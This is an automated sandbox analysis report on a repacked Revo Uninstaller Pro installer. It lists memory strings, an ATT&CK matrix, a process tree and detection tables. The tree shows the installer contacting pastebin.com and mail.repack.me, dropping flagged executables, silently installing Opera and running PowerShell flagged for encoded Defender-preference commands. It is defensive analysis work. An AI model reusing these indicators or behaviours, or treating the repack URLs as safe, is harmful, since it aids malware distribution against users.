      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: TrayNotifyWndHunter TopHunter RightHunter LeftShell_TrayWndHunter Window AOTHunter Window SizeHunter ModeHunter Bottom\Microsoft\Internet Explorer\Quick LaunchStart HunterHunter TransparencySDSysPagerToolbarWindow32SHELLDLL_DefViewSysListView3275%50%25%ReBarWindow32 /tn "Revo Uninstaller Pro Hunter Mode" /create /XML " /hunter\Explorer.exe/Delete /TN "Revo Uninstaller Pro Hunter Mode" /F schtasks.exe6.1Windows 7,8,VistaWindows XPWindows XP,Vista,7,8Windows 86.25.1Windows 7Windows Vista6.0Windows 8.16.310.110.05.2 %D %sUDMFT%06d%sUDTMP%sEVREM%06d %S %M %H %Tc%02ld
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpBinary or memory string: Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TrayNotifyWndHunter RightHunter TopShell_TrayWndHunter LeftHunter Window SizeHunter Window AOTHunter BottomHunter ModeStart Hunter\Microsoft\Internet Explorer\Quick LaunchSDHunter TransparencyToolbarWindow32SysPagerSysListView32SHELLDLL_DefView50%75%ReBarWindow3225%/create /XML /tn "Revo Uninstaller Pro Hunter Mode" \Explorer.exe" /hunterschtasks.exe/Delete /TN "Revo Uninstaller Pro Hunter Mode" /F
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000005140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSLISTVIEW32SHELLDLL_DefViewSysListView32Program ManagerProgman`
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEE34B cpuid 16_2_00FEE34B
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: GetLocaleInfoW,GetNumberFormatW,16_2_00FE9D99
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\System32\runonce.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FECBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,16_2_00FECBB8
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
      MITRE ATT&CK matrix (one line per tactic; the number in front of a technique is the count shown in the matrix for that technique):

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
      Execution: 1 Windows Management Instrumentation; 12 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
      Persistence: 1 DLL Side-Loading; 1 Component Object Model Hijacking; 21 Windows Service; 21 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
      Privilege Escalation: 1 DLL Side-Loading; 1 Component Object Model Hijacking; 1 Access Token Manipulation; 21 Windows Service; 12 Process Injection; 21 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd
      Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 43 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 12 Process Injection; 1 Regsvr32; 1 Rundll32
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
      Discovery: 11 System Time Discovery; 4 File and Directory Discovery; 56 System Information Discovery; 231 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
      Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
      Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
      Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      Behavior Graph
      Behavior Graph ID: 1571786
      Sample: Revo.Uninstaller.Pro.v5.3.4.exe
      Startdate: 09/12/2024
      Architecture: WINDOWS
      Score: 44

      Sample-level network contacts: pastebin.com; trn.lb.opera.technology; 17 other IPs or domains
      Sample-level signatures: Multi AV Scanner detection for dropped file; Possible COM Object hijacking; AI detected suspicious sample; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet; Connects to a pastebin service (likely for C&C) (pastebin.com)

      Process tree (indentation shows parent/child; counts after a process name are the graph's own node counters):
      Revo.Uninstaller.Pro.v5.3.4.exe (67 138) started
          Network: pastebin.com 104.20.3.235, 443, 49736 CLOUDFLARENETUS United States; mail.repack.me 194.87.189.43, 443, 49737 AS-REGRU Russian Federation
          Dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32; C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32; C:\Users\user\AppData\Local\...\System.dll, PE32; 15 other files (8 malicious)
          Signatures: Creates an undocumented autostart registry key; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Sample is not signed and drops a device driver
          cmd.exe started
              PACK.EXE started
                  Dropped: C:\Users\user\AppData\Local\Temp\...\ya.exe, PE32
                  Signatures: Multi AV Scanner detection for dropped file; Suspicious powershell command line found
                  ya.exe started
                      Network: trn.lb.opera.technology 107.167.96.30, 443, 49824, 49857 IOFLOODUS United States
                      Dropped: C:\Users\user\Downloads\OperaSetup.exe, PE32; C:\Users\user\AppData\Local\...\System.dll, PE32; C:\Users\user\AppData\Local\...\INetC.dll, PE32; C:\Users\user\AppData\...\OperaSetup[1].exe, PE32
                      Signatures: Multi AV Scanner detection for dropped file
                      OperaSetup.exe started
                          Dropped: C:\Users\user\AppData\Local\...\setup.exe, PE32
                          setup.exe started
                              Network: submit-trn.osp.opera.software 107.167.125.189, 443, 49851, 49859 OPERASOFTWAREUS United States; na-download.opera.com 107.167.96.36, 443, 49858 IOFLOODUS United States; 2 other IPs or domains
                              Dropped: Opera_installer_2412091654075368040.dll, PE32; C:\Users\user\AppData\Local\...\setup.exe, PE32; C:\Users\user\AppData\Local\...\opera_package, PE32; Opera_115.0.5322.7...toupdate_x64[1].exe, PE32
                              setup.exe started
                                  Dropped: Opera_installer_2412091654101308068.dll, PE32
                                  setup.exe started
                                      Dropped: Opera_installer_2412091654106048056.dll, PE32
                              setup.exe started
                                  Dropped: Opera_installer_2412091654079011640.dll, PE32
                              setup.exe started
                                  Dropped: Opera_installer_2412091654087472252.dll, PE32
                  powershell.exe started
                      Signatures: Loading BitLocker PowerShell Module
                      conhost.exe started
                  powershell.exe started
                      conhost.exe started
                  powershell.exe started
                      conhost.exe started
              conhost.exe started
          rundll32.exe (4 2) started
              Dropped: C:\Windows\system32\...\revoflt.sys (copy), PE32+; C:\Windows\System32\drivers\SETB88F.tmp, PE32+
              Signatures: Creates an autostart registry key pointing to binary in C:\Windows
              runonce.exe (2) started
                  grpconv.exe started
          RevoUninPro.exe (16 5) started
          3 other processes started
      ruplp.exe started

      Source | Detection | Scanner | Label
      Revo.Uninstaller.Pro.v5.3.4.exe | 17% | ReversingLabs | Win32.Malware.Nemesis
      Source | Detection | Scanner | Label
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll | 0% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe | 0% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe | 0% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe | 0% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | 0% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe | 0% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys | 2% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys | 0% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy) | 0% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys | 0% | ReversingLabs |
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tsjtmfdm[1].pkg | 30% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654075368040.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654079011640.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654087472252.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654101308068.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654106048056.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\PACK.EXE | 30% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | 25% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\INetC.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\LangDLL.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\System.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsDialogs.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsExec.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\INetC.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\System.dll | 0% | ReversingLabs |
      C:\Windows\System32\drivers\SETB88F.tmp | 0% | ReversingLabs |
      C:\Windows\system32\DRIVERS\revoflt.sys (copy) | 0% | ReversingLabs |
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label
      http:////file:////www.web.OS | 0% | Avira URL Cloud | safe
      https://mail.repack.me/y | 0% | Avira URL Cloud | safe
      https://mail.repack.me/tsjtmfdm.pkgo | 0% | Avira URL Cloud | safe
      https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new | 0% | Avira URL Cloud | safe
      http://autoupdate-staging.services.ams.osa/netinstallervwindows?&One | 0% | Avira URL Cloud | safe
      https://legal.opera.com/terms | 0% | Avira URL Cloud | safe
      http://localhost:3001api/prefs/?product=$1&version=$2.. | 0% | Avira URL Cloud | safe
      http://www.mirage-systems.de/tq | 0% | Avira URL Cloud | safe
      http://www.mirage-systems.de/Q | 0% | Avira URL Cloud | safe
      http://crl.microsoftRR | 0% | Avira URL Cloud | safe
      http://www.mirage-systems.de/a | 0% | Avira URL Cloud | safe
      https://www.revouninstallerpro.com/db/ilogs/Uninstaller | 0% | Avira URL Cloud | safe
      https://crashpad.chromium.org/ | 0% | Avira URL Cloud | safe
      http://www.animation.arthouse.org | 0% | Avira URL Cloud | safe
      https://sourcecode.opera.com | 0% | Avira URL Cloud | safe
      https://gamemaker.io) | 0% | Avira URL Cloud | safe
      http://www.Licence-Protector.com | 0% | Avira URL Cloud | safe
      https://mail.repack.me/ | 0% | Avira URL Cloud | safe
      https://www.revouninstallerpro.com/db/ilogs/.ruelDelete | 0% | Avira URL Cloud | safe
      https://mail.repack.me/rosoft | 0% | Avira URL Cloud | safe
      http://www.mirage-systems.de/%operationName% | 0% | Avira URL Cloud | safe
      http://www.vsrevogroup.com | 0% | Avira URL Cloud | safe
      https://mail.repack.me/tsjtmfdm.pkg | 0% | Avira URL Cloud | safe
      https://legal.opera.com/terms. | 0% | Avira URL Cloud | safe
      https://crashpad.chromium.org/bug/new | 0% | Avira URL Cloud | safe
      http://www.mirage-systems.de/ | 0% | Avira URL Cloud | safe
      http://repacks.ddns.nethttps://repack.me/ad.htmlopen | 0% | Avira URL Cloud | safe
      http://www.borland.com/namespaces/TypesA | 0% | Avira URL Cloud | safe
      https://repack.me/ad.html | 0% | Avira URL Cloud | safe
      http://www.borland.com/namespaces/Types | 0% | Avira URL Cloud | safe
      http://repacks.ddns.netopen | 0% | Avira URL Cloud | safe
      https://mail.repack.me/tsjtmfdm.pkg2 | 0% | Avira URL Cloud | safe
      https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.com | 0% | Avira URL Cloud | safe
      http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1 | 0% | Avira URL Cloud | safe
      https://legal.opera.com/eula/computers | 0% | Avira URL Cloud | safe
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      mail.repack.me | 194.87.189.43 | true | false | | unknown
      na-download.opera.com | 107.167.96.36 | true | false | | high
      na-autoupdate.opera.com | 107.167.96.38 | true | false | | high
      submit-trn.osp.opera.software | 107.167.125.189 | true | false | | high
      trn.lb.opera.technology | 107.167.96.30 | true | false | | high
      pastebin.com | 104.20.3.235 | true | false | | high
      autoupdate.geo.opera.com | unknown | unknown | false | | high
      download3.operacdn.com | unknown | unknown | false | | high
      desktop-netinstaller-sub.osp.opera.software | unknown | unknown | false | | high
      features.opera-api2.com | unknown | unknown | false | | high
      autoupdate.opera.com | unknown | unknown | false | | high
      net.geo.opera.com | unknown | unknown | false | | high
      download.opera.com | unknown | unknown | false | | high
      Name | Malicious | Antivirus Detection | Reputation
      https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=a6c287cc-47e5-4bf0-9dac-fbaf9040d09e&product=&channel=Stable&version=115.0.5322.77 | false | | high
      https://desktop-netinstaller-sub.osp.opera.software/v1/binary | false | | high
      https://download.opera.com/download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=cd9f81c6-729a-4d95-ac71-1ebba75bfc7b | false | | high
      https://mail.repack.me/tsjtmfdm.pkg | false | Avira URL Cloud: safe | unknown
      https://autoupdate.opera.com/me/ | false | | high
      https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64 | false | | high
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://mail.repack.me/y | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://legal.opera.com/terms | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | Avira URL Cloud: safe | unknown
      https://mail.repack.me/tsjtmfdm.pkgo | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://help.opera.com/latest/ | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://www.revouninstaller.com/feedback/?product=pro%d-%d-%dLast | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp | false | | high
      http://www.schneier.com/paper-blowfish-fse.htmlS | ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | false | | high
      https://policies.google.com/terms; | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstaller | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      http://www.mirage-systems.de/tq | ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://tools.ietf.org/html/rfc4648S | ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | false | | high
      http://localhost:3001api/prefs/?product=$1&version=$2.. | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | Avira URL Cloud: safe | unknown
      https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | Avira URL Cloud: safe | unknown
      https://www.opera.com/download/ | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/ | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://schemas.xmlsoap.org/wsdl/soap12/SV | ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | false | | high
      http://www.color.org | ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | false | | high
      http:////file:////www.web.OS | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.0000000140887000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.0000000140887000.00000002.00000001.01000000.0000000C.sdmp | false | Avira URL Cloud: safe | unknown
      https://www.revouninstaller.com/contact-us/C: | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://autoupdate-staging.services.ams.osa/netinstallervwindows?&One | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.mirage-systems.de/Q | ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://www.opera.com | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://crashstats-collector-2.opera.com/ | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://autoupdate.geo.opera.com/https://autoupdate.opera.com/me/OperaDesktophttps://crashstats-coll | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      http://crl.microsoftRR | powershell.exe, 00000011.00000002.2327417192.00000000083CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.mirage-systems.de/a | ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://www.revouninstaller.com/support/ | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp | false | | high
      https://crashpad.chromium.org/ | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | Avira URL Cloud: safe | unknown
